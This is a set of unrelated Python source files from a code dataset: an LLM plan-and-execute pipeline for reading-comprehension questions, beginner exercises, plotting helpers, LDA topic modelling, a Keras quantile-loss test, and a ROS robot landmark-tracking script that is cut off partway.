a list of actions, each item is a map of the format:\n {\"action\": action_name, \n \"args\": [arg1, arg2, ...], \n \"output_var\": output_name,\n \"detailed_action\": detailed_action_string,\n 'action_def': action_def if it is a new action}\n output_map: a map of the format:\n {\"output_1\": None, \"output_2\": None, ...}\n \n Output (if invalid plan):\n is_valid\n error message\n invalid plan\n \"\"\"\n global all_actions\n # separate new actions from plans\n plan_sp = [x for x in plan.split(\"\\n\\n\") if len(x.strip()) > 0]\n if len(plan_sp) != 2:\n error_message = \"Invalid plan: Need to have two parts (new actions and plan) separated by a blank line.\"\n return False, error_message, \"\\n\\n\".join(plan_sp)\n\n new_actions = plan_sp[0]\n plan = plan_sp[1]\n\n # parse new actions\n try:\n new_actions = [x.replace(\"- \", \"\").strip() for x in new_actions.split(\"\\n\")[1:] if len(x.strip()) > 0]\n this_new_actions = {}\n for line in new_actions:\n if \"none\" in line.lower():\n break\n lsp = line.split(\":\")\n action_type = lsp[0][:lsp[0].index(\"(\")]\n action_args = lsp[0][lsp[0].index(\"(\")+1:lsp[0].index(\")\")].split(\",\")\n action_def = lsp[1].strip()\n all_actions[action_type] = {\"args\": [x.strip() for x in action_args], \"action_def\": action_def}\n except:\n error_message = \"Invalid plan: new actions format is incorrect.\"\n return False, error_message, '\\n\\n'.join(plan_sp)\n \n # parse plan\n plan = [x.strip() for x in plan.split(\"\\n\") if len(x.strip()) > 0]\n output_map = {}\n actions = []\n for row in plan:\n try:\n row = row[row.index(\".\")+1:].strip()\n except:\n error_message = f\"Invalid plan: no number index and '.' found in action \\n\\t{row}.\"\n return False, error_message, \"\\n\".join(plan)\n\n try:\n row = row.split(\"=\")\n except:\n error_message = \"Invalid plan: no '=' found in one of the actions\"\n return False, error_message, \"\\n\".join(plan)\n\n try:\n output = row[0].strip()\n output_map[output] = None\n action_and_args = row[1][:row[1].index(\":\")].strip()\n action_and_args = action_and_args.split(\"(\")\n action_definitions = row[1][row[1].index(\":\")+1:].strip()\n action = action_and_args[0].strip()\n args = [x.lstrip().rstrip() for x in action_and_args[1][:-1].split(\",\")]\n action_map = {\"action\": action, \"args\": args, \"output_var\": output, \"detailed_action\": action_definitions}\n actions.append(action_map)\n except:\n error_message = \"Error parsing plan. Plan format is incorrect. Please check the plan format.\"\n return False, error_message, \"\\n\".join(plan)\n \n for action in actions:\n if action[\"action\"] not in all_actions and action[\"action\"] not in this_new_actions:\n error_message = f\"Error parsing action {action['action']}. Unknown action.\"\n return False, error_message, \"\\n\".join(plan)\n \n if action[\"action\"] in this_new_actions:\n action[\"action_def\"] = this_new_actions[action[\"action\"]][\"action_def\"]\n defined_args = this_new_actions[action[\"action\"]][\"args\"]\n else:\n defined_args = all_actions[action[\"action\"]][\"args\"]\n\n this_args = action[\"args\"]\n\n if action[\"action\"] != \"CONCAT\":\n if len(defined_args) != len(this_args):\n error_message = f\"Error parsing action {action['action']}. Number of arguments is incorrect\"\n return False, error_message, \"\\n\".join(plan)\n\n if action[\"output_var\"] in this_args:\n error_message = f\"Error parsing action {action['action']}. Output variable is used as an argument\"\n return False, error_message, \"\\n\".join(plan)\n\n for arg in action[\"args\"]:\n if arg == \"CTX\":\n continue\n if arg not in output_map and \"\\\"\" not in arg:\n error_message = f\"Error parsing action {action['action']}. Argument {arg} is not defined.\"\n return False, error_message, \"\\n\".join(plan)\n \n return True, actions, output_map\n\ndef execute_plan(actions, plan, question, output_map, article, debug=False):\n \"\"\"\n Input:\n actions: a list of actions, each item is a map of the format:\n {\"action\": action_name, \n \"args\": [arg1, arg2, ...], \n \"output_var\": output_name\n \"detailed_action\": detailed_action_string,\n \"action_def\": action_def if it is a new action}\n plan: the plan in string format\n output_map: a map of the format \n {\"output_1\": None, \"output_2\": None, ...} which stores \n the value of each output variable\n article: the article\n debug: whether to print debug information\n Output:\n end_response: concatenation of last step output and intermediate output if it is not fed as input to other actions\n \"\"\"\n all_args = []\n max_len = 8192\n reslen = 512\n for action in actions:\n action_name = action[\"action\"]\n args = action[\"args\"]\n current_action = f'{action_name}({\", \".join(args)})'\n all_args.extend(args)\n args = [x if x == \"CTX\" or \"\\\"\" in x else output_map[x] for x in args]\n args = [article if x == \"CTX\" else x for x in args]\n if \"action_def\" in action:\n action_func = Action(question, plan, action_name, action[\"detailed_action\"], action_def=action[\"action_def\"], current_action=current_action) \n else:\n action_func = Action(question, plan, action_name, action[\"detailed_action\"], current_action=current_action)\n action_func_prompt = action_func.this_prompt\n if sum([len(enc.encode(x)) for x in args]) + len(enc.encode(action_func_prompt)) + reslen + 1 > max_len:\n truncated_idx = sum([len(enc.encode(x)) for x in args]) + len(enc.encode(action_func_prompt)) + reslen + 1 - max_len\n args[0] = enc.decode(enc.encode(args[0])[:-truncated_idx]) + \"...\"\n try:\n output = action_func(*args)\n except:\n print(\"Error executing action\")\n print(action)\n print(args)\n print(output_map)\n return None\n \n output_map[action[\"output_var\"]] = output + \"\\n\"\n if debug:\n print(action)\n print(output)\n print(\"=\"*23)\n \n # TODO: new\n end_response = \"\"\n for action in actions:\n if action[\"output_var\"] not in all_args:\n end_response += output_map[action[\"output_var\"]] + \"\\n\\n\"\n return end_response\n\ndef _pearl(args, article, qid, question, options, invalid_plan=None, all_error_messages=[]):\n \"\"\"\n execute pearl for individual example\n \"\"\"\n error_message = None\n retry_cnt = 0\n all_error_messages = all_error_messages\n while True:\n # generate plan, if plan is invalid, ask the model to correct+refine the plan\n plan_str = generate_plan(question[\"question\"], \n invalid_plan=invalid_plan, \n error_message=error_message, \n all_error_messages=all_error_messages, \n debug=args.debug, \n plan_prompt=args.prompt_plan_file,\n plan_prompt_invalid=args.prompt_plan_invalid_file,)\n # parse plan\n is_valid, out_1, out_2 = parse_plan(plan_str)\n if is_valid:\n plan = out_1\n output_map = out_2\n break\n else:\n error_message = out_1\n invalid_plan = plan_str\n retry_cnt += 1\n print(error_message)\n all_error_messages.append(error_message)\n if retry_cnt > 7:\n break\n\n if retry_cnt > 7:\n print(f\"Error: {qid}\")\n print(\"Need to fallback to baseline open-answer\")\n continue\n\n if args.debug:\n print(f\"Plan: {plan}\")\n\n # execute plan \n response = execute_plan(plan, plan_str, question[\"question\"], output_map, article, debug=args.debug)\n # map open answer to choice\n this_map_prompt = map_prompt.format(open_answer=response, question=question[\"question\"], options=options)\n\n map_response = get_response(this_map_prompt,\n model=model_name,\n frequency_penalty=0,\n temperature=0.0,\n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=4)[0]\n\n if args.debug:\n print(f\"Answer: {response}\")\n print(f\"Map prompt: {this_map_prompt}\")\n print(f\"Map answer: {map_response}\")\n print(\"=\"*20)\n \n res_dict = {\"qid\": qid, \n \"plan\": plan_str, \n \"open-answer\": response, \n \"map-answer\": map_response, \n \"gold\": option_map[int(question['gold_label'])]}\n return res_dict, output_map\n\ndef refine(args):\n '''\n Refine the demonstration examples that are incoporated into the plan formulation stage\n The demonstration examples should not be any examples the model is evaluated on\n '''\n global debug\n debug = args.debug\n\n articles, questions = load_quality_data(\"train-demo\", None)\n with open(args.output_file + f\".train_demo.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"plan\", \"open-answer\", \"map-answer\", \"gold\"])\n writer.writeheader()\n\n for qi, qid in enumerate(tqdm(questions)):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n\n retry_cnt = 0\n all_error_messages = []\n first_incorrect_plan = None\n invalid_plan = None\n while True:\n res_dict, _ = _pearl(args, article, qid, question, options, invalid_plan=invalid_plan, all_error_messages=all_error_messages)\n if res_dict[\"map-answer\"] == res_dict[\"gold\"]:\n break\n else:\n invalid_plan = res_dict[\"plan\"]\n if first_incorrect_plan is None:\n first_incorrect_plan = invalid_plan\n retry_cnt += 1\n all_error_messages.append(f\"{invalid_plan.lstrip().rstrip()}\\n\\nError: Incorrect plan. Could not map to correct answer. Please rethink the plan strategy.\\n\\n\")\n if retry_cnt > 3:\n break\n if retry_cnt > 3:\n continue\n writer.writerow(res_dict)\n\n except Exception as e:\n print(f\"Error: {qid}\")\n print(e)\n continue\n\n # print output\n with open(args.output_file + f\".train_demo.csv\", \"r\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n qid = row[\"qid\"]\n question = questions[qid]['question'].strip()\n plan = row[\"plan\"]\n\n print(f\"Question: \\\"{question}\\\"\\n\\nAnswer:\\n{plan}\\n---\\n\")\n\ndef baseline_mcq(args, this_split=\"dev\", this_type=\"ctx_eval_long\"):\n # load prompt\n prompt = \"Article\\n\\n{article}End of Article\\n\\nQuestion:{question}\\n{options}\\n\\nRead the article and answer the question by selecting the best option. Only one of the options is correct.\\n\\nAnswer (select from A, B, C, D):\\n\"\n \n articles, questions = load_quality_data(this_split, this_type)\n\n # for each question, generate open-ended answer with options and write to file\n # write to file\n with open(args.output_file + f\".{this_split}.{this_type}.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"answer\", \"gold\"])\n writer.writeheader()\n total_cnt = 0\n crrc_cnt = 0\n for qid in tqdm(questions):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n this_prompt = prompt.format(article=article, question=question[\"question\"], options=options)\n \n len_this_prompt = len(enc.encode(this_prompt))\n if len_this_prompt + max_output_len > 8192:\n if args.debug:\n print(f\"Exceed length limit: {len_this_prompt}\")\n article = enc.decode(enc.encode(article)[:-(len_this_prompt + max_output_len - 8192 + 1)])\n this_prompt = prompt.format(article=article, question=question[\"question\"], options=options)\n \n response = get_response(this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=5)[0]\n os.system(\"sleep 5s\") \n if args.debug:\n print(f\"Prompt: {this_prompt}\")\n print(f\"Answer: {response}\")\n print(\"=\"*20)\n writer.writerow({\"qid\": qid, \"answer\": response, 'gold': option_map[int(question['gold_label'])]})\n total_cnt += 1\n crrc_cnt += 1 if response == option_map[int(question['gold_label'])] else 0\n print(f\"Accuracy: {crrc_cnt / total_cnt}\")\n\n except Exception as e:\n print(e)\n continue\n print(f\"Accuracy: {crrc_cnt / total_cnt}\") \n\ndef baseline_gqa(args, this_split=\"dev\", this_type=\"ctx_eval_long\"):\n # load prompt\n this_prompt_template = load_prompt(f\"./prompt_bank/freeform_ans.txt\")\n \n articles, questions = load_quality_data(this_split, this_type)\n\n # for each question, generate open-ended answer with options and write to file\n # write to file\n with open(args.output_file + f\".{this_split}.{this_type}.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"open-answer\", \"map-answer\", \"gold\"])\n writer.writeheader()\n total_cnt = 0\n crrc_cnt = 0\n\n for qid in tqdm(questions):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n this_prompt = this_prompt_template.format(article=article, question=question[\"question\"])\n len_this_prompt = len(enc.encode(this_prompt))\n if len_this_prompt + max_output_len > 8192:\n if args.debug:\n print(f\"Exceed length limit: {len_this_prompt}\")\n article = enc.decode(enc.encode(article)[:-(len_this_prompt + max_output_len - 8192 + 1)])\n this_prompt = this_prompt_template.format(article=article, question=question[\"question\"])\n \n response = get_response(this_prompt,\n model=model_name, \n frequency_penalty=0, \n temperature=0.0, \n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=max_output_len)\n os.system(\"sleep 5s\") # change this if there aren't any excessive rate limit errors\n\n this_map_prompt = map_prompt.format(open_answer=response, question=question[\"question\"], options=options)\n \n map_response = get_response(this_map_prompt,\n model=model_name,\n frequency_penalty=0,\n temperature=0.0,\n top_p=0.0,\n stop=[\"\\n\\n\\n\"],\n max_tokens=4)[0]\n if args.debug:\n print(f\"Prompt: {this_prompt}\")\n print(f\"Answer: {response}\")\n print(f\"Map prompt: {this_map_prompt}\")\n print(f\"Map answer: {map_response}\")\n print(\"=\"*20)\n\n writer.writerow({\"qid\": qid, \"open-answer\": response, \"map-answer\": map_response, 'gold': option_map[int(question['gold_label'])]})\n total_cnt += 1\n crrc_cnt += 1 if map_response == option_map[int(question['gold_label'])] else 0\n print(f\"Accuracy: {crrc_cnt/total_cnt}\")\n except Exception as e:\n print(f\"Error: {qid}\")\n print(e)\n continue\n\ndef pearl(args, this_split=\"dev\", this_type=\"ctx_eval_long\"):\n\n global debug \n debug = args.debug\n\n articles, questions = load_quality_data(this_split, this_type)\n\n all_output_map = {}\n with open(args.output_file + f\".{this_split}.{this_type}.csv\", \"w\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"qid\", \"plan\", \"open-answer\", \"map-answer\", \"gold\"])\n writer.writeheader()\n total_cnt = 0\n crrc_cnt = 0\n \n for qi, qid in enumerate(tqdm(questions)):\n try:\n question = questions[qid]\n options = get_option_str(question)\n article = articles[question[\"article_id\"]]\n\n res_dict, output_map = _pearl(args, article, qid, question, options)\n writer.writerow(res_dict)\n \n all_output_map[qid] = output_map\n\n total_cnt += 1\n if res_dict[\"map-answer\"] == res_dict[\"gold\"]:\n crrc_cnt += 1\n \n print(f\"Accuracy: {crrc_cnt/total_cnt}\")\n\n except Exception as e:\n print(f\"Error: {qid}\")\n print(e)\n continue\n \n # save output_map to pickle\n output_map_file = args.output_file + f\".{this_split}.{this_type}.output_map.pkl\"\n with open(output_map_file, \"wb\") as f:\n pickle.dump(all_output_map, f, protocol=pickle.HIGHEST_PROTOCOL)\n \ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stage\", type=str, choices=[\"mine_actions\", \"simplify_actions\", \"refine\", \"baseline_mcq\", \"baseline_gqa\", \"pearl\"])\n parser.add_argument(\"--prompt-plan-file\", type=str, default=\"\")\n parser.add_argument(\"--prompt-plan-invalid-file\", type=str, default=\"\")\n parser.add_argument(\"--input-file\", type=str, default=\"\")\n parser.add_argument(\"--output-file\", type=str, default=\"\")\n parser.add_argument(\"--debug\", action=\"store_true\", default=False)\n parser.add_argument(\"--shard-size\", type=int, default=80, help=\"number of actions per shard during action simplification\")\n return parser.parse_args()\n\ndef main():\n args = parse_args()\n if args.stage == \"mine_actions\":\n mine_actions(args)\n\n elif args.stage == \"simplify_actions\":\n simplify_actions(args)\n\n elif args.stage == \"refine\":\n load_actions()\n refine(args)\n\n elif args.stage == \"baseline_mcq\":\n baseline_mcq(args, this_split=\"dev\", this_type=\"ctx_eval_long\")\n baseline_mcq(args, this_split=\"train\", this_type=\"ctx_eval_long\")\n baseline_mcq(args, this_split=\"dev\", this_type=\"ctx_eval_short\")\n\n elif args.stage == \"baseline_gqa\":\n baseline_gqa(args, this_split=\"dev\", this_type=\"ctx_eval_long\")\n baseline_gqa(args, this_split=\"train\", this_type=\"ctx_eval_long\")\n baseline_gqa(args, this_split=\"dev\", this_type=\"ctx_eval_short\")\n\n elif args.stage == \"pearl\":\n load_actions()\n pearl(args, this_split=\"dev\", this_type=\"ctx_eval_long\")\n pearl(args, this_split=\"train\", this_type=\"ctx_eval_long\")\n pearl(args, this_split=\"dev\", this_type=\"ctx_eval_short\")\n \n else:\n raise ValueError(\"Unknown stage\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"SimengSun/pearl","sub_path":"pearl.py","file_name":"pearl.py","file_ext":"py","file_size_in_byte":31077,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"61"}
+{"seq_id":"72297370435","text":"#1\na = [1, 2, 3, 6, 8, 12, 20, 32, 46, 85]\nb = []\nfor number in a:\n if number < 5:\n b.append(number)\nprint(b)\n\n\n#2\nlist_a = ['dog', 'cat', 'rabbit', 'hamster', 'gerbil']\nlist_b = ['dog', 'hamster', 'snake']\na = set(list_a)\nintersection = a.intersection(list_b)\nc = list(intersection)\nprint(c)\n\n\nd = set(list_a).symmetric_difference(list_b)\nprint(d)\ne = set(list_a) ^ set(list_b)\nprint(e)\n\n#3\nsentence = 'hi dee hi how are you mr dee'\nwords = sentence.split(' ')\nresult = {}\nfor word in words:\n result[word] = result.get(word, 0) + 1\ntotal = len(sentence.split())\nprint('word count:', result)\nprint('total words:',total)\n\n#4\nage = int(input(\"What is your age? \"))\nret = 65\nif age > ret:\n print(\"stop working, youre too old\")\nelif age == ret:\n print(\"you retire this year\")\nelse:\n retage = ret-int(age)\n print(\"you have \", retage, \" years until retirement, yikes...\")\n\n\n#5\nletter_scores = {'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4,\n'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1,\n'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1,\n's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8,\n'y': 4, 'z': 10,}\n\nword = input('Enter a word:')\nprint('your entered word is:', word)\nword_score = 0\nfor letter in word:\n word_score += letter_scores[letter]\nprint('your word score is: ', word_score)\n","repo_name":"nickcurci/ArcPy","sub_path":"CodingChallenges/2 - Week_Two/1- Coding Challenge One For Week2.py","file_name":"1- Coding Challenge One For Week2.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"17673425330","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.colors import ListedColormap, colorConverter, LinearSegmentedColormap\n\n# from https://github.com/amueller/mglearn/blob/cbae37d906261dad173cbc6696dcef69dfd0cbaf/mglearn/plot_helpers.py\ncm = ListedColormap(['#0000aa', '#ff2020'])\n\n\n# from https://github.com/amueller/mglearn/blob/cbae37d906261dad173cbc6696dcef69dfd0cbaf/mglearn/tools.py\ndef visualize_coefficients(coefficients, feature_names, n_top_features=25):\n \"\"\"Visualize coefficients of a linear model.\n Parameters\n ----------\n coefficients : nd-array, shape (n_features,)\n Model coefficients.\n feature_names : list or nd-array of strings, shape (n_features,)\n Feature names for labeling the coefficients.\n n_top_features : int, default=25\n How many features to show. The function will show the largest (most\n positive) and smallest (most negative) n_top_features coefficients,\n for a total of 2 * n_top_features coefficients.\n \"\"\"\n coefficients = coefficients.squeeze()\n if coefficients.ndim > 1:\n # this is not a row or column vector\n raise ValueError(\"coeffients must be 1d array or column vector, got\"\n \" shape {}\".format(coefficients.shape))\n coefficients = coefficients.ravel()\n\n if len(coefficients) != len(feature_names):\n raise ValueError(\"Number of coefficients {} doesn't match number of\"\n \"feature names {}.\".format(len(coefficients),\n len(feature_names)))\n # get coefficients with large absolute values\n coef = coefficients.ravel()\n positive_coefficients = np.argsort(coef)[-n_top_features:]\n negative_coefficients = np.argsort(coef)[:n_top_features]\n interesting_coefficients = np.hstack([negative_coefficients,\n positive_coefficients])\n # plot them\n plt.figure(figsize=(15, 5))\n colors = [cm(1) if c < 0 else cm(0)\n for c in coef[interesting_coefficients]]\n plt.bar(np.arange(2 * n_top_features), coef[interesting_coefficients],\n color=colors)\n feature_names = np.array(feature_names)\n plt.subplots_adjust(bottom=0.3)\n plt.xticks(np.arange(1, 1 + 2 * n_top_features),\n feature_names[interesting_coefficients], rotation=60,\n ha=\"right\")\n plt.ylabel(\"Coefficient magnitude\")\n plt.xlabel(\"Feature\")\n \n \n# from https://github.com/amueller/mglearn/blob/cbae37d906261dad173cbc6696dcef69dfd0cbaf/mglearn/tools.py\ndef print_topics(topics, feature_names, sorting, topics_per_chunk=6,\n n_words=20):\n for i in range(0, len(topics), topics_per_chunk):\n # for each chunk:\n these_topics = topics[i: i + topics_per_chunk]\n # maybe we have less than topics_per_chunk left\n len_this_chunk = len(these_topics)\n # print topic headers\n print((\"topic {:<8}\" * len_this_chunk).format(*these_topics))\n print((\"-------- {0:<5}\" * len_this_chunk).format(\"\"))\n # print top n_words frequent words\n for i in range(n_words):\n try:\n print((\"{:<14}\" * len_this_chunk).format(\n *feature_names[sorting[these_topics, i]]))\n except:\n pass\n print(\"\\n\")\n","repo_name":"jkafrouni/text-deployment-demo","sub_path":"scripts/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72356905795","text":"import nltk\nimport pandas\nimport pymorphy2\nimport gensim\nfrom gensim import corpora\nfrom gensim.models import CoherenceModel\nfrom nltk.corpus import stopwords\n\n\n# get normalized review function\ndef get_normalized_review(text):\n analyzer = pymorphy2.MorphAnalyzer()\n normalized_words = []\n tokens = nltk.word_tokenize(text)\n puncto = [',', '.', ':', '?', '«', '»', '-', '(', ')', '!', '\\'', '—', ';', '”', '...', '–']\n for token in tokens:\n if token in puncto: continue\n normalized_words.append(analyzer.parse(token)[0].normal_form)\n # added some stopwords which were received after the 1st run\n stopword_set = set(stopwords.words(\"russian\"))\n stopword_set.add('фильм')\n stopword_set.add('свои')\n stopword_set.add('это')\n stopword_set.add('весь')\n stopword_set.add('который')\n normalized_words = [w for w in normalized_words if not w in stopword_set]\n return normalized_words\n\n\n# filter reviews by its title\ndef filter_by_titles(data_frame, reviews_titles):\n return data_frame[~data_frame['title'].isin(reviews_titles)]\n\n\ndef main():\n dictionary = corpora.Dictionary(df['text'])\n corpus = [dictionary.doc2bow(text) for text in df['text']]\n\n # define numbers of topics and words\n topics_number_const = 10\n words_number_const = 15\n lda = gensim.models.ldamodel.LdaModel(corpus, num_topics=topics_number_const, id2word=dictionary, passes=15)\n\n for index, topic in lda.show_topics(num_topics=topics_number_const, formatted=False, num_words=words_number_const):\n print('Topic: {} \\nWords: {}'.format(index, [word[0] for word in topic]))\n\n cm = CoherenceModel(model=lda, texts=df['text'], dictionary=dictionary)\n coherence = cm.get_coherence()\n print(coherence)\n\n\n# all reviews\ndf = pandas.read_csv(\"filmreviews.csv\", encoding=\"utf-8\")\ndf['text'] = df['text'].map(lambda x: get_normalized_review(x))\n","repo_name":"annette-st/NLP_homework","sub_path":"lda/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41648725457","text":"# 커스텀 로스를 해보자 \n\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\n\n#===========================================================\n\n# mse 만들기\ndef custom_mse(y_true, y_pred): # y_true, y_pred 의 이름을 바꿔도 알아서 y원래값과 y예측값으로 들어간다.\n return tf.math.reduce_mean(tf.square(y_true-y_pred)) # 이 식이 원래 mse의 식 #square = 제곱한 것\n\n\n# 퀀타일 로스1를 지정해주자\ndef quantile_loss(y_true, y_pred):\n qs = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n q = tf.constant(np.array([qs]), dtype=tf.float32) # constant = 상수라는 뜻\n e = y_true - y_pred\n v = tf.maximum(q*e, (q-1)*e)\n return K.mean(v)\n\n# 데이콘 베이스라인에서 가져온 퀀타일 로스\ndef quantile_loss_dacon(q, y_true, y_pred):\n err = (y_true - y_pred)\n return K.mean(K.maximum(q*err, (q-1)*err), axis=-1)\n\nquantiles = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n\n#===========================================================\n\n#1. 데이터\nx = np.array([1,2,3,4,5,6,7,8]).astype('float32') # 이렇게 실수형으로 바꾸든\n# x = np.array([1.,2.,3.,4.,5.,6.,7.,8.]).astype('float32') # 이렇게 실수형으로 바꾸든\ny = np.array([1,2,3,4,5,6,7,8]).astype('float32')\nprint(x.shape) #(8, ) 스칼라가 8개\n\n\n#2. 모델\nmodel = Sequential()\nmodel.add(Dense(10, input_shape=(1,)))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n# model.compile(loss=quantile_loss, optimizer='adam')\nmodel.compile(loss = lambda y_true, y_pred: quantile_loss_dacon(quantiles[0], y_true, y_pred), optimizer='adam') # 데이콘에서 가져온 것 \n\n# quantiles[0] = 0.1 이다.\n# lambda y_true, y_pred: quantile_loss(q, y_true, y_pred)\n# ------------- --------------------------------\n# 이거를 여기에 넣겠다.\n\n\nmodel.fit(x, y, epochs=50, batch_size=1)\n\nloss = model.evaluate(x,y)\nprint(loss)\n\n# mse 만들어준거\n# 0.00034028213121928275\n\n# 퀀타일1 만든거\n# 0.008313745260238647\n\n# 퀀타일 [0]째 거\n# 0.0066979192197322845\n","repo_name":"YoungriKIM/STUDY","sub_path":"keras/keras60_3_quantile_loss_dacon.py","file_name":"keras60_3_quantile_loss_dacon.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"33830178584","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom nav_msgs.msg import Path\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import PoseStamped, Point, Pose2D, Quaternion\nfrom visualization_msgs.msg import Marker\nfrom std_msgs.msg import Header, ColorRGBA, Bool, Int32\n\n\nfrom kf import kf_update\nfrom workspace import Workspace\nfrom task import Task\nfrom biased_TLRRT_star import generate_NBA, generate_path\nfrom neural_net import generate_nn_output\n# from display_landmark import show_landmark1#, show_landmark2\n\nchannel_open = True\n\ngot_image_1 = False\ngot_image_2 = False\ngot_image_3 = False\ngot_image_4 = False\ngot_image_5 = False\n\nmarker_1 = Marker()\nmarker_2 = Marker()\nmarker_3 = Marker()\nmarker_4 = Marker()\nmarker_5 = Marker()\nmarker_6 = Marker()\nmarker_7 = Marker()\nmarker_8 = Marker()\nmarker_9 = Marker()\nmarker_10 = Marker()\nmarker_11 = Marker()\nmarker_12 = Marker()\nmarker_13 = Marker()\nlm_marker_1 = Marker()\nlm_marker_2 = Marker()\nlm_marker_3 = Marker()\nlm_marker_4 = Marker()\nlm_marker_5 = Marker()\nlm_marker_6 = Marker()\nlm_marker_7 = Marker()\nlm_marker_8 = Marker()\nlm_marker_9 = Marker()\nlm_marker_10 = Marker()\nlm_marker_11 = Marker()\nlm_marker_12 = Marker()\nlm_marker_13 = Marker()\n\nrob1_wp_id = 0\nrob2_wp_id = 0\nrob3_wp_id = 0\nrob4_wp_id = 0\nrob5_wp_id = 0\n\nprint(\"testing workflow 1\")\nworkspace = Workspace()\nworkspace.update_covariance_shape()\ntask=Task()\nall_robot_waypoints = []\nrobot_wp_satsify_AP = []\nnum_of_classes = workspace.no_of_classes \n\ndisplay_target_landmarks = True\nsensor_noise_cov = [[0.2, 0], [0, 0.2]]\n\"\"\"\nexample of defining the sensor model:\nsensor_model = [[P(person|person), \tP(person|car), \tP(person|bike)],\n\t\t\t\t[P(car|person), \tP(car|car), \tP(car|bike)],\n\t\t\t\t[P(bike|person),\tP(bike|car), \tP(bike|bike)]]\n\"\"\"\nsensor_model = [[0.80, 0.18, 0.02],\n\t\t\t\t[0.23, 0.75, 0.02],\n\t\t\t\t[0.06, 0.04, 0.9]] \n\nbuchi, buchi_graph = generate_NBA()\n\nprint(\"testing workflow 2\")\n\ndef update_landmark_estimates(nn_output):\n\tglobal workspace\n\tfor key in nn_output.keys():\n\t\tx_estimate = workspace.landmark[key][0]\n\t\tcov = workspace.landmark[key][1]\n\t\tobs = nn_output[key][1]\n\t\tx_estimate, cov = kf_update(cov, x_estimate, obs, sensor_noise_cov)\n\t\tworkspace.landmark[key][0] = x_estimate\n\t\tworkspace.landmark[key][1]= cov\n\t\tworkspace.generate_samples_for_lm(key)\n\t\tworkspace.update_covariance_shape_for_lm(key)\n\t\t\n\ndef update_class_distribution(nn_output):\n\tglobal workspace\n\tfor key in nn_output.keys():\n\t\tpair = key.split('_') # region-robot pair\n\t\trobot_index = int(pair[0][1:]) - 1\n\t\tclass_id = nn_output[key][0][0] - 1\n\t\tcond_prob = np.empty((num_of_classes,), float)\n\t\tcond_prob[class_id] = nn_output[key][2][class_id]\n\t\tfor i in range(num_of_classes):\n\t\t\tif i!=class_id:\n\t\t\t\tcond_prob[i] = sensor_model[class_id][i]\n\t\tworkspace.classes[robot_index] = workspace.classes[robot_index]*cond_prob/(workspace.classes[robot_index]*cond_prob).sum()\n\n\ndef get_lm_color(nba_truth, num_of_lm):\n \"\"\"\n 1: neutral\n 2: landmark\n 3: avoid\n \"\"\"\n lm_color=np.ones(num_of_lm)\n if nba_truth['truth']!='1':\n\t for key in nba_truth['truth'].keys():\n\t if nba_truth['truth'][key]==True:\n\t pair = key.split('_')\n\t lm_color[int(pair[0][1:])-1] = 2\n for key in nba_truth['avoid'].keys():\n for j in range(len(nba_truth['avoid'][key])):\n lm_color[int(nba_truth['avoid'][key][j][0][1:])-1]=3\n for key in nba_truth['avoid_self_loop'].keys():\n for j in range(len(nba_truth['avoid_self_loop'][key])):\n lm_color[int(nba_truth['avoid_self_loop'][key][j][0][1:])-1]=3\n return lm_color\n\n\ndef show_landmark1(data,key_id,position,shape,marker):\n\tchord1 = shape[0][0]\n\tchord2 = shape[0][1]\n\tif chord1>chord2:\n\t\tlong_chord = chord1\n\telse:\n\t\tlong_chord = chord2\n\tif chord1<0.5:\n\t\tchord1=0.5\n\tif chord2<0.5:\n\t\tchord2=0.5\n\theight = 2/long_chord\n\tif height>4:\n\t\theight = 4\n\n\tmarker.header = data.header\n\tmarker.type = Marker.CYLINDER\n\tmarker.pose.position.x = position[0]\n\tmarker.pose.position.y = position[1]\n\tmarker.pose.position.z = height/2\n\tmarker.pose.orientation = Quaternion(0,0,shape[1][0],shape[1][1])\n\n\tmarker.scale.x = chord1\n\tmarker.scale.y = chord2\n\n\tmarker.scale.z = height\n\tmarker.color=ColorRGBA(0.013, 0.01, 0.9, 0.8)\n\tmarker.lifetime=rospy.Duration()\n\ndef show_landmark_color(data,key_id,marker,lm_color):\n\tmarker.header = 